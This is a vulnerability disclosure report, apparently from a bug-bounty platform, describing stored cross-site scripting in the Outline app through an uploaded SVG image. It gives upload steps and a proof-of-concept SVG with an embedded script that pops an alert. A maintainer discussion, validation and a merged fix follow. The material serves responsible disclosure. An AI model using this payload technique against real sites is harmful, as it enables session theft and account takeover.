xss via svg file in outline/outline

Valid

Reported on

Jul 1st 2022


Description

xss via svg file

Proof of Concept

1. goto your account and create a document under a collection .
2. Now edit this document and upload bellow svg file in this document content as image

filename-->evil.svg

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" >
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert('Thais app is probably vulnerable to XSS attackss!');
   </script>
</svg>

3. after upload open the svg file url and see xss is executed

Impact

xss to control victim account

We are processing your report and will contact the outline team within 24 hours. a month ago
ranjit-git modified the report
a month ago
We have contacted a member of the outline team and are waiting to hear back a month ago
Tom Moor
a month ago

Maintainer


Scripts within SVG's is a feature of the format, it is not inherently a bug or security issue. Images are hosted on a completely separate domain without any cookies or other user data, are you able to prove xss to control victim account?

ranjit-git modified the report
a month ago
outline/outline maintainer has acknowledged this report a month ago
Tom Moor validated this vulnerability 18 days ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Tom Moor confirmed that a fix has been merged on 206545 18 days ago
The fix bounty has been dropped
to join this conversation